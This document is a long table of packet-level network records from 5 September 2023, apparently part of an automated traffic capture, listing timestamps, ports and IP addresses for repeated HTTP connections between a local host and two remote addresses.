Sep 5, 2023 13:02:42.099853992 CEST	80	49758	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:42.101263046 CEST	80	49758	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:42.407244921 CEST	80	49758	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:42.407289028 CEST	80	49758	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:42.407486916 CEST	49758	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:42.410212994 CEST	49758	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:42.605592966 CEST	49759	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:42.734476089 CEST	80	49759	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:42.734791994 CEST	49759	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:42.735210896 CEST	49759	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:42.736463070 CEST	49759	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:42.865040064 CEST	80	49759	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:42.865964890 CEST	80	49759	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:43.156150103 CEST	80	49759	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:43.156187057 CEST	80	49759	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:43.156352997 CEST	49759	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:43.158521891 CEST	49759	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:43.418387890 CEST	49760	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:43.546804905 CEST	80	49760	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:43.547054052 CEST	49760	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:43.547434092 CEST	49760	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:43.548638105 CEST	49760	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:43.677272081 CEST	80	49760	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:43.677891016 CEST	80	49760	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:43.981542110 CEST	80	49760	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:43.981659889 CEST	80	49760	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:43.981832027 CEST	49760	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:43.984941959 CEST	49760	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:44.183310986 CEST	49761	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:44.311610937 CEST	80	49761	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:44.311881065 CEST	49761	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:44.424302101 CEST	49761	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:44.425565004 CEST	49761	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:44.552737951 CEST	80	49761	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:44.553659916 CEST	80	49761	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:44.868376017 CEST	80	49761	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:44.868418932 CEST	80	49761	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:44.868554115 CEST	49761	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:44.870738983 CEST	49761	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:45.065278053 CEST	49762	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:45.193548918 CEST	80	49762	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:45.193880081 CEST	49762	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:45.194621086 CEST	49762	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:45.197458029 CEST	49762	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:45.326796055 CEST	80	49762	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:45.328205109 CEST	80	49762	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:45.621404886 CEST	80	49762	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:45.621473074 CEST	80	49762	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:45.621671915 CEST	49762	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:45.627885103 CEST	49762	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:45.834315062 CEST	49763	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:45.963068008 CEST	80	49763	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:45.963339090 CEST	49763	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:45.963816881 CEST	49763	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:45.965296984 CEST	49763	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:46.094916105 CEST	80	49763	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:46.095640898 CEST	80	49763	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:46.380932093 CEST	80	49763	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:46.381072998 CEST	80	49763	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:46.381339073 CEST	49763	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:46.386782885 CEST	49763	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:46.583591938 CEST	49764	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:46.712075949 CEST	80	49764	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:46.712363005 CEST	49764	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:46.712899923 CEST	49764	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:46.714171886 CEST	49764	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:46.843671083 CEST	80	49764	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:46.844779015 CEST	80	49764	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:47.141078949 CEST	80	49764	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:47.141140938 CEST	80	49764	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:47.141454935 CEST	49764	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:47.146802902 CEST	49764	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:47.308374882 CEST	49765	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:47.439990997 CEST	80	49765	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:47.440237999 CEST	49765	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:47.441241980 CEST	49765	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:47.443515062 CEST	49765	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:47.573101044 CEST	80	49765	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:47.575483084 CEST	80	49765	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:47.918494940 CEST	80	49765	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:47.918539047 CEST	80	49765	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:47.918689966 CEST	49765	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:47.921063900 CEST	49765	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:03.271565914 CEST	49766	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:03.400029898 CEST	80	49766	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:03.400324106 CEST	49766	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:03.401012897 CEST	49766	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:03.403244972 CEST	49766	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:03.529614925 CEST	80	49766	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:03.531574965 CEST	80	49766	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:03.799978018 CEST	80	49766	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:03.800081968 CEST	80	49766	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:03.800251961 CEST	49766	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:03.802891970 CEST	49766	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:04.002573013 CEST	49767	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:04.132824898 CEST	80	49767	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:04.132939100 CEST	49767	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:04.133225918 CEST	49767	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:04.133985043 CEST	49767	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:04.261841059 CEST	80	49767	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:04.262471914 CEST	80	49767	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:04.532296896 CEST	80	49767	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:04.532325983 CEST	80	49767	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:04.532474041 CEST	49767	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:04.667124987 CEST	49767	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:04.857866049 CEST	49768	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:04.986463070 CEST	80	49768	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:04.986664057 CEST	49768	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:04.987086058 CEST	49768	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:04.988643885 CEST	49768	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:05.115679026 CEST	80	49768	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:05.117221117 CEST	80	49768	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:05.386718988 CEST	80	49768	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:05.386756897 CEST	80	49768	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:05.386964083 CEST	49768	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:05.390841961 CEST	49768	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:05.884090900 CEST	49769	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:06.016777039 CEST	80	49769	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:06.016920090 CEST	49769	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:06.024326086 CEST	49769	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:06.025150061 CEST	49769	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:06.157506943 CEST	80	49769	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:06.157568932 CEST	80	49769	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:06.424838066 CEST	80	49769	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:06.424885035 CEST	80	49769	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:06.425035954 CEST	49769	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:06.427010059 CEST	49769	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:07.721569061 CEST	49770	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:07.853301048 CEST	80	49770	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:07.853552103 CEST	49770	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:07.853878021 CEST	49770	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:07.854650021 CEST	49770	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:07.982429028 CEST	80	49770	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:07.983125925 CEST	80	49770	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:08.239799976 CEST	80	49770	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:08.239861965 CEST	80	49770	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:08.240101099 CEST	49770	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:08.246251106 CEST	49770	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:08.430634975 CEST	49771	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:08.559283018 CEST	80	49771	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:08.559570074 CEST	49771	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:08.559906006 CEST	49771	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:08.560960054 CEST	49771	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:08.691921949 CEST	80	49771	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:08.691977978 CEST	80	49771	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:08.966351986 CEST	80	49771	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:08.966384888 CEST	80	49771	104.21.60.111	192.168.2.4
Sep 5, 2023 13:03:08.966568947 CEST	49771	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:08.968573093 CEST	49771	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:03:09.127379894 CEST	49772	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:09.256328106 CEST	80	49772	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:09.256556988 CEST	49772	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:09.257374048 CEST	49772	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:09.259506941 CEST	49772	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:09.385956049 CEST	80	49772	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:09.388026953 CEST	80	49772	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:09.704988956 CEST	80	49772	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:09.705065012 CEST	80	49772	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:09.705324888 CEST	49772	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:09.710596085 CEST	49772	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.481153965 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.609560966 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.610208988 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.610208988 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.612934113 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.738748074 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.738908052 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.741233110 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.741369963 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.741422892 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.741455078 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.741487026 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.741517067 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.741532087 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.741549969 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.741616964 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.741657972 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.741671085 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.741765976 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.867362022 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.867651939 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.869704962 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.869729042 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.869884014 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.869885921 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.869908094 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.869925976 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.869939089 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.869956970 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.869887114 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.870078087 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.870078087 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.870078087 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.870111942 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.870131016 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.870150089 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.870294094 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.870294094 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.870321035 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.870354891 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.870354891 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.870419025 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.910973072 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.911180973 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:10.998414993 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:10.998737097 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.000624895 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.000777960 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.000797987 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.000813961 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.000821114 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.000835896 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.000973940 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.000974894 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.000988007 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.000998020 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001019001 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.001199961 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.001386881 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001401901 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001415968 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001576900 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.001615047 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001631975 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001638889 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001646996 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001655102 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001662970 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001671076 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001683950 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001692057 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001828909 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001843929 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.001864910 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.001930952 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.001971960 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.002032042 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.039292097 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.039392948 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.039567947 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.039567947 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.129621029 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.129647970 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.129853964 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.131680965 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131699085 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131712914 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131721020 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131736994 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131752014 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131767035 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131783962 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131799936 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131814957 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131829977 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131835938 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.131838083 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131917000 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.131966114 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131966114 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.131980896 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.131995916 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132004976 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.132009983 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132025957 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132038116 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132052898 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132066011 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132081032 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132105112 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.132147074 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.132193089 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.132245064 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132334948 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.132508993 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132522106 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132535934 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132544041 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132551908 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132679939 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.132735968 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.132813931 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132827044 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132841110 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.132951021 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.132951021 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.133143902 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133157969 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133171082 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133177996 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133193016 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133207083 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133220911 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133235931 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133249998 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133265018 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133280039 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133289099 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133289099 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.133302927 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133317947 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133333921 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133348942 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133363962 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133363962 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.133378983 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133394003 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133409977 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.133450031 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.133522987 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.133572102 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.170461893 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.170515060 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.170547962 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.170659065 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.170777082 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.260152102 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.260199070 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.260340929 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.260451078 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.260551929 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.260730028 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.260818005 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.260855913 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.261002064 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.262058020 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.262192011 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263196945 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263237953 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263269901 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263294935 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263300896 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263330936 CEST	49773	80	192.168.2.4	172.67.195.229
